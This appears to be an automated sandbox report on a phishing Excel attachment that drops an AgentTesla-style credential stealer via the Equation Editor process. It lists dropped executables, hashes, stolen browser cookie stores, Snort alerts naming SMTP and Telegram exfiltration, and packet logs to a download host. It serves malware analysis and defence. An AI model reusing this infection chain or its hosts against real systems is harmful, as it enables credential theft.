                                  • 144.76.136.153

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\maxdyn2.1[1].exe

                                  Download File
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Category:dropped
                                  Size (bytes):437857
                                  Entropy (8bit):7.111056886494438
                                  Encrypted:false
                                  SSDEEP:6144:WYa60xbEUHi5vD/IaOHPAhsYOUWlgV75xPV/i+wgn2eMmVdbDyr4L43hTHL:WYCxtY7/83YPPF/i+wwDMm3yr48Tr
                                  MD5:1CEC9C1FA633D554029A6402174612D1
                                  SHA1:E1E78DA0AA4693520428D567C33A3A84FE921D28
                                  SHA-256:FA5CE3B72762CCAD4365AC01E3B6ADFE7864B8D4065D5C7FFA266865746A4706
                                  SHA-512:064E23A151A88922A84F03EF110AAC9641C42651AD53FC5BCD807EF4751209FB281D5DFED718FF58D7462B75E1EBA93EE9EE173336D280092B43F04585412A1B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 36%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\maxdyn2.1[1].htm

                                  Download File
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):169
                                  Entropy (8bit):4.51833957423091
                                  Encrypted:false
                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
                                  MD5:84855C13836B389D5EC7CFD4C9266173
                                  SHA1:1CF3056FF23C4176FD7CA9816A000ED461D6D323
                                  SHA-256:502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
                                  SHA-512:2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

                                  C:\Users\user\AppData\Local\Temp\C21.tmp

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):1536
                                  Entropy (8bit):1.1464700112623651
                                  Encrypted:false
                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\word.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6089
                                  Entropy (8bit):7.152515480225036
                                  Encrypted:false
                                  SSDEEP:96:Farc6oYdg/DrYum6Pk2XO5oSwY26zxyI6zwOWPMjjSMCV763doT1QBDFRnToEtCg:FarcRF/hX1S92rI6zw3PMjOnVWm4zxt1
                                  MD5:0BB62A24E1C4BA564B2955208EC425A4
                                  SHA1:290835BE626C75982BCF6FDA4C3A30C0959E933B
                                  SHA-256:49808CA9A19F80AB31F99AFB9BE50C1AD72B454E0E05EC0CEBCB4318AF8F106E
                                  SHA-512:52C6B0568A64B0B1A0D4E50E2EEFFE982D2157E46F4BEAC1239FEF6B4518772C6225C0E4B59B79E3C9FF3B906E95AD82C135B762EA09591CDD260907BF34998F
                                  Malicious:false
                                  Reputation:low
                                  Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                  C:\Users\user\AppData\Local\Temp\gebgvlm.mce

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\word.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):271066
                                  Entropy (8bit):7.971057420310617
                                  Encrypted:false
                                  SSDEEP:6144:5praAyoXuxoSOiPJqzDTyXtF+yWZtwa/AAISfplt6yJY:P+A1exoXihQDTyXtF+eAISfB6yJY
                                  MD5:4226677AC10D1E9C98E7FA0BE1801081
                                  SHA1:E653B5DDE2497E0EA31564108A0CD6BC30588091
                                  SHA-256:A9166C519742C1F3FDB958B604AA997D9F90619F63BB52EB4F4F2A40119893AE
                                  SHA-512:604AD9EAA2CC53963F2DFF1677F2AEC966023FC13E72163C9DA07F8839FC7ED08733BD388221E1460A38C65B0AAB4088C75C588DC66C0E83DEF8AA431D6DD1E3
                                  Malicious:false
                                  Reputation:low
                                  Preview:"..._)...*.uR...B....X...ht..J..9.g|........O........7..Q3\.....L..l....6..=..W.A,C .|........l.......@....Q..!K+..m..2...&....0.HO.*:..C.*.3.f..|^.`. ..58...8Rbc...m..!.f.l-...^.a..E|y.7.KT.......8..H...H)i.A...0.N..P...Q... $..........A.j.(...P...)...[.u....|.....X...ht...W..v.|....M...O..@~....7...3\./..#.._l...dq.L......*j.Y(......?\..B..h...\...?r....r...82...&....^...[f"$.^.t....$.z .....0n4K.....%\..&...b*.J..{.2.5r..=.3....A#.$I.X.K..dch.+ >..uh..<..U......_iiz..../.i^.L.A.j.(..].eu.)..2b.u....;(..>X...ht..J..9.g....J...........!7...3\.j..#.._l...q.L....P,.<..Y(R)K..Ma\..B.g....\...?r........+....&.......[..8...M..$H.0. ....%0n.K.....%\..&...b*..&.%.2.5r..=.3....A#.$I.X.K..+y... >..uh..<..U....z..._iiz..../.i^.L.A.j.(...P...)..?*.u....;....X...ht..J..9.g|........O........7..Q3\./..#.._l...q.L....b..*j.Y(..K..?\..B.gh...\...?r....r...82...&....^...[......t..$H.0. .....0n4K.....%\..&...b*..&.%.2.5r..=.3....A#.$I.X.K..+y... >..uh..<..U....z..

                                  C:\Users\user\AppData\Local\Temp\lyebkz.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\word.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):102400
                                  Entropy (8bit):6.5023788666751425
                                  Encrypted:false
                                  SSDEEP:1536:UoJrPl54EsPLskvqzGUUzKx0sDuEse2OdHL8JiuGISrFuDthslJ5:7JBC/PLdXUUzKxbuBJi9+hsH5
                                  MD5:41467466B6E727C3C65D9501F6A23A04
                                  SHA1:9FD6FEEA3C5F566571A5499A3DFF7777C2BD642E
                                  SHA-256:10E0B5018E1B719E9E06C97E5A42E73B6F6E43400D512DFE641488D473B60BB0
                                  SHA-512:63B304710504834B5E139A48FBD8C6D483FE3D828187752FFB77E1D2AF76BCC08F9F1B8CD7D314EF36AC26F286F95C652298C8EA69A915E4CFB83AAC7A72334E
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............b.}.b.}.b.}.0.}.b.}.0.}.b.}..j}.b.}.b.}8b.}.0.}.b.}.0.}.b.}Rich.b.}........................PE..L....>.c.................J...`......]........`....@.........................................................................|........................................................................................`..L............................text....I.......J.................. ..`.rdata...1...`...2...N..............@..@.data....,..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\nso9271.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\word.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):391675
                                  Entropy (8bit):7.717276941987671
                                  Encrypted:false
                                  SSDEEP:6144:ApraAyoXuxoSOiPJqzDTyXtF+yWZtwa/AAISfplt6yJoG2PLdXUiKx:A+A1exoXihQDTyXtF+eAISfB6yJoGmJK
                                  MD5:B3C6FF655C39C19AEB67C868B59D9EEA
                                  SHA1:D73532A8010A9A23C33B9518A6BEF306BDFB1A30
                                  SHA-256:80C5D55745ADA2AFB3D89DB60A30B3BF53144366EACB27E6D64E487350E9452B
                                  SHA-512:58E4F5CD697D2951F6B50BB0008A81A9C4058EA8FF93D23D3D2288F1BB39BF561E2FA5A310ACFB40443D453BFC4B68CCB895476F04A9C0D9381AD04BD8504B4B
                                  Malicious:false
                                  Preview:H/......,...................u...........f.......0/..............................................................................!...........................................................................................................................................................G...................j...........................................................................................................................................?...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\~DFD6E0A1119A5FCA71.TMP

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1527808
                                  Entropy (8bit):7.441644636879638
                                  Encrypted:false
                                  SSDEEP:24576:HItAjrBHn7n623BhtYSupBEE4VDHKJ2nIphalaq8E57SiVc8A3QA48kBlPM:UAHj62ju0EOqhhFvEpSwcxdk
                                  MD5:D9E7D18852579B0B72FCF6D015753D2D
                                  SHA1:5EA807AB3629865DB9367B9B0BE474416E18A44A
                                  SHA-256:779CADBEF88550653A7A0D84D728D0F63C15D5A37F7F408382CDC5DEDBE14062
                                  SHA-512:B87677ADA7E640A9C24AC2130CE6B3A97A633882B49E4233A534E13E8AD665586610A05B2825369574090C3BEB955C7A216266DC1F36668440B6E60661146D37
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\word.exe

                                  Download File
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Category:dropped
                                  Size (bytes):437857
                                  Entropy (8bit):7.111056886494438
                                  Encrypted:false
                                  SSDEEP:6144:WYa60xbEUHi5vD/IaOHPAhsYOUWlgV75xPV/i+wgn2eMmVdbDyr4L43hTHL:WYCxtY7/83YPPF/i+wwDMm3yr48Tr
                                  MD5:1CEC9C1FA633D554029A6402174612D1
                                  SHA1:E1E78DA0AA4693520428D567C33A3A84FE921D28
                                  SHA-256:FA5CE3B72762CCAD4365AC01E3B6ADFE7864B8D4065D5C7FFA266865746A4706
                                  SHA-512:064E23A151A88922A84F03EF110AAC9641C42651AD53FC5BCD807EF4751209FB281D5DFED718FF58D7462B75E1EBA93EE9EE173336D280092B43F04585412A1B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 36%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\yn4sky33.ptd\Chrome\Default\Cookies

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, file counter 9, database pages 7, 1st free page 7, free pages 2, cookie 0xd, schema 4, UTF-8, version-valid-for 9
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):0.9650411582864293
                                  Encrypted:false
                                  SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                  MD5:903C35B27A5774A639A90D5332EEF8E0
                                  SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                  SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                  SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\yn4sky33.ptd\Firefox\Profiles\7xwghk55.default\cookies.sqlite

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000, page size 32768, writer version 2, read version 2, file counter 4, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                  Category:dropped
                                  Size (bytes):524288
                                  Entropy (8bit):0.08107860342777487
                                  Encrypted:false
                                  SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                  MD5:1138F6578C48F43C5597EE203AFF5B27
                                  SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                  SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                  SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                  Malicious:false
                                  Preview:SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\Desktop\~$PURCHASE ORDER & SAMPLE IMAGE.xlsx

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):165
                                  Entropy (8bit):1.4377382811115937
                                  Encrypted:false
                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                  Malicious:true
                                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                  Static File Info

                                  General

                                  File type:Microsoft Excel 2007+
                                  Entropy (8bit):7.9985592022971685
                                  TrID:
                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                  • ZIP compressed archive (8000/1) 16.67%
                                  File name:PURCHASE ORDER & SAMPLE IMAGE.xlsx
                                  File size:1299605
                                  MD5:27f586f26da21955c782e9268ad1c4ce
                                  SHA1:b9be1204d078c487f6ade5e2a6cd2164c46a7996
                                  SHA256:2d46eee159ec36ab5e9f8bc29a7e0464c9b1be8c3454cdb8c9880640dcfda02f
                                  SHA512:8dd0dde10816b2f2653492c9a942454862fe4ff6607ceef511bde7899d2678b61d576c6e336a5b351a384e8acc06557ad13877f6c3d290c08d14402f5b038c65
                                  SSDEEP:24576:M3+8kJrnHnTNAu3BhBYSApBiQSxDH+4+Wn7EpfYlHB0lW9ZbKY+q7JCYcqt:MP0HhAwjAyQ+e4bnoYFBHZF+qNZt
                                  TLSH:ED5533E65038D45CEF0998B250EDD7565A31A0D610DBD0E2B2FC5CBA10BBFF5E268AD0
                                  File Content Preview:PK........T.2V.m.]....i.......[Content_Types].xmlUT...BR.cBR.cBR.c.UKO.1.....6.....1......h.....P..M;...N........l.i..|.G.fY.l.!jg....,.+..v\...]..e..U.8..[Ad7..'...C..mc.&....('P..;..fF....7...r&........"Xl`.`..>..ZA.,.>..t..p$6X.[9.....&........9.[.C..F

                                  File Icon

                                  Icon Hash:e4e2aa8aa4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OpenXML
                                  Number of OLE Files:1

                                  OLE File "/opt/package/joesandbox/database/analysis/786424/sample/PURCHASE ORDER & SAMPLE IMAGE.xlsx"

                                  Indicators
                                  Has Summary Info:
                                  Application Name:
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:False
                                  Flash Objects Count:0
                                  Contains VBA Macros:False
                                  Summary
                                  Author:
                                  Last Saved By:
                                  Create Time:2022-11-18T02:05:27Z
                                  Last Saved Time:2022-11-18T02:07:12Z
                                  Creating Application:
                                  Security:0
                                  Document Summary
                                  Thumbnail Scaling Desired:false
                                  Contains Dirty Links:false
                                  Shared Document:false
                                  Changed Hyperlinks:false
                                  Application Version:12.0000

                                  Streams

                                  Stream Path: \x1ole10NATIVe, File Type: data, Stream Size: 1508006
                                  General
                                  Stream Path:\x1ole10NATIVe
                                  File Type:data
                                  Stream Size:1508006
                                  Entropy:7.438472943097563
                                  Base64 Encoded:True
                                  Data ASCII:Y . . & 2 . . | B . . . V - q . - 3 R . . . 1 . . o . . " F A . W @ K . ! i . . , A f U B x [ ) . u : . . . . V S . % . d . U S H _ ( . 1 R L / [ 3 } u ~ . . k . L q . S x s \\ . H > n x . z k , . c s f t . . * S c , ) . & . . 2 . R ] . 7 1 o U * J E . 7 E v m , & i b 4 . # 3 n o . c . e v . . / p q a 6 H % . M > . 6 . = 6 V [ U m \\ a f ) Y 3 7 : = J . 6 h . . ~ . b i . . c . K . L 7 [ o c ) . ^ _ 9 . L . ) B W + . M t . a . . Q . . w 8 . . 3 7 . . F r j 0 . { . H 0 . { . } . . g . ) H G 9 . . m .
                                  Data Raw:59 b3 93 04 03 20 26 ed 32 ce 01 08 b5 7c b9 c3 42 ba ff f7 d1 8b 19 8b 13 bb 8e d9 56 2d 81 eb de 71 10 2d 8b 33 52 ff d6 05 c7 96 03 31 05 9c b1 06 cf ff e0 6f e9 14 c5 18 22 46 41 00 57 c5 f6 96 40 4b bd f3 19 a7 8e 21 f5 be 69 d9 8c 06 9a 2c 41 66 8c 55 cb d0 42 78 5b 29 0a f4 75 ea 3a e7 96 af 9a 01 96 e6 2e e2 fa 16 9a 9a 56 b8 e7 53 12 bb 25 06 80 99 64 a0 91 9b 03 ee 55 53
                                  Stream Path: rSp6HEeS5QRFS, File Type: empty, Stream Size: 0
                                  General
                                  Stream Path:rSp6HEeS5QRFS
                                  File Type:empty
                                  Stream Size:0
                                  Entropy:0.0
                                  Base64 Encoded:False
                                  Data ASCII:
                                  Data Raw:

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.225.249.163.12491795872030171 01/18/23-09:14:44.835847TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49179587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491765872851779 01/18/23-09:14:10.473531TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49176587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491775872851779 01/18/23-09:14:10.519471TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49177587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491765872030171 01/18/23-09:14:10.473417TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49176587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491785872840032 01/18/23-09:14:44.736459TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249178587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491795872851779 01/18/23-09:14:44.836010TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49179587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491795872840032 01/18/23-09:14:44.836010TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249179587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491785872030171 01/18/23-09:14:44.736395TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49178587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491765872840032 01/18/23-09:14:10.473531TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249176587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491775872840032 01/18/23-09:14:10.519471TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249177587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491775872030171 01/18/23-09:14:10.519401TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49177587192.168.2.225.249.163.12
                                  192.168.2.225.249.163.12491785872851779 01/18/23-09:14:44.736459TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49178587192.168.2.225.249.163.12

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 18, 2023 09:13:37.180238008 CET4917380192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.283632040 CET8049173144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.283818960 CET4917380192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.285243988 CET4917380192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.385544062 CET8049173144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.385618925 CET8049173144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.385747910 CET4917380192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.445662022 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.445740938 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.445817947 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.482435942 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.482506037 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.876799107 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.877036095 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.888057947 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:37.888099909 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.888847113 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:37.888950109 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:38.243690014 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:38.243752003 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:39.916760921 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:39.916841984 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:39.916862011 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:39.916896105 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:39.916919947 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:39.916929007 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:39.916946888 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:39.916954041 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:39.916981936 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:39.917001963 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:39.927768946 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.117497921 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.117599964 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.117796898 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.117796898 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.117837906 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.117939949 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.118000031 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.328938007 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.328959942 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.329016924 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.329107046 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.329137087 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.329157114 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.329185963 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.329344034 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.548795938 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.548815966 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.548871994 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.548922062 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.548962116 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.548983097 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.549010038 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.549099922 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.766771078 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.766789913 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.766839027 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.766870975 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.766910076 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.766937017 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.766962051 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.767075062 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.986762047 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.986785889 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.986843109 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.986949921 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.986984015 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:40.987025023 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.987145901 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:40.987145901 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:41.205790043 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:41.205815077 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:41.205904007 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:41.206020117 CET49174443192.168.2.22144.76.136.153
                                  Jan 18, 2023 09:13:41.206053972 CET44349174144.76.136.153192.168.2.22
                                  Jan 18, 2023 09:13:41.206075907 CET49174443192.168.2.22144.76.136.153
